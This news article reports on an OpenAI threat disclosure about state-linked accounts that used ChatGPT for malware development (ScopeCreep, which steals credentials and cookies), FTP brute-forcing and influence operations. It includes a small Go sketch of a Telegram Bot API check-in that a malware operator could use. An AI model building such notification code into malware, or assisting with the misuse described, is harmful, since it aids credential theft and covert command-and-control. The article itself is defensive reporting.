Malicious Accounts Linked to Malware, Influence Operations

OpenAI is using its artificial intelligence models to detect and counter abuse, and has banned accounts associated with malicious state-linked operations.
Hackers aligned with Russia, China, North Korea and Iran have used OpenAI’s tools to support malware development and social media manipulation, the company said. It also detected some activity from Cambodia and the Philippines.
Among the groups disrupted is a Russian-speaking actor who used ChatGPT to develop and refine malware dubbed ScopeCreep. OpenAI said the actor used temporary email addresses to create accounts, engaging the chatbot once per account to debug code, set up HTTPS requests and modify PowerShell commands to evade Windows Defender. Researchers saw the malware, written in Go, distributed through a repository impersonating a gaming utility called Crosshair X.
The malicious code initiated a multi-stage process that escalated privileges, maintained stealthy persistence, and exfiltrated credentials and cookies. It also contained logic to notify the operator through a Telegram channel when new systems were compromised.
OpenAI said it had observed the threat actor using its models to assist with tasks such as integrating the Telegram API, debugging malware components and configuring command-and-control infrastructure. The malware was publicly available, but there is no indication of large-scale infections, and OpenAI said it was able to intervene at what it characterized as an early stage of development.
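The report does not reproduce the actor's code, but the Telegram mechanic it describes is simple to picture. The sketch below, written in Go since that is the language ScopeCreep was built in, shows one plausible way a program could post a check-in message through Telegram's public Bot API sendMessage endpoint. The bot token, chat ID and message text are hypothetical placeholders, not values recovered from the malware.

    package main

    import (
        "fmt"
        "net/http"
        "net/url"
    )

    // notifyOperator posts a message to a Telegram chat using the Bot API's
    // sendMessage endpoint, which accepts a simple form-encoded POST.
    func notifyOperator(botToken, chatID, message string) error {
        endpoint := fmt.Sprintf("https://api.telegram.org/bot%s/sendMessage", botToken)
        resp, err := http.PostForm(endpoint, url.Values{
            "chat_id": {chatID},
            "text":    {message},
        })
        if err != nil {
            return err
        }
        defer resp.Body.Close()
        if resp.StatusCode != http.StatusOK {
            return fmt.Errorf("telegram API returned status %d", resp.StatusCode)
        }
        return nil
    }

    func main() {
        // Placeholder credentials for illustration only.
        if err := notifyOperator("<BOT_TOKEN>", "<CHAT_ID>", "new host checked in"); err != nil {
            fmt.Println("notification failed:", err)
        }
    }

Because bot traffic rides over ordinary HTTPS to api.telegram.org, notifications like this are cheap to build and blend into normal web traffic, which helps explain the channel's popularity with malware operators.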
Other banned accounts were linked to two hacking groups commonly attributed to the Chinese government and tracked as APT5 and APT15. OpenAI said the hackers used ChatGPT for open-source research and for troubleshooting Linux system configurations, software development and infrastructure setup. This included building offline software packages and configuring firewalls and name servers.
The same groups explored using AI to automate social media influence. OpenAI found instances of ChatGPT being used to generate posts and interactions for platforms including Facebook, Instagram, TikTok and X, formerly Twitter. In some cases, the accounts asked ChatGPT for help developing scripts to brute-force FTP credentials or to deploy Android apps that programmatically control social media content.
The report describes other state-linked clusters engaged in online influence or cybercrime. One operation, likely linked to North Korea, used OpenAI's models to support fraudulent employment schemes by creating convincing resumes and task documentation for IT roles. Another campaign generated multilingual social media content on geopolitically sensitive topics for distribution across major platforms.
OpenAI cited a campaign it named “Operation Uncle Spam,” in which accounts generated English, Spanish and Swahili content that appeared aimed at polarizing discourse on divisive U.S. political issues. The posts appeared on platforms including Bluesky and X, sometimes from accounts posing as Americans.
The company said it did not observe actors using ChatGPT to achieve entirely new capabilities, but that its tools were being used to improve workflow efficiency and scale messaging output. In some cases, this included translation, code debugging or scripting help for deceptive messaging campaigns.
The new report builds on prior disclosures by OpenAI, including a February update that detailed how accounts linked to Chinese and North Korean operations had used ChatGPT to support information operations and scams. The company says its approach combines detection methods, human oversight, and collaboration with peers to limit abuse (see: China Using AI-Powered Surveillance Tools, Says OpenAI).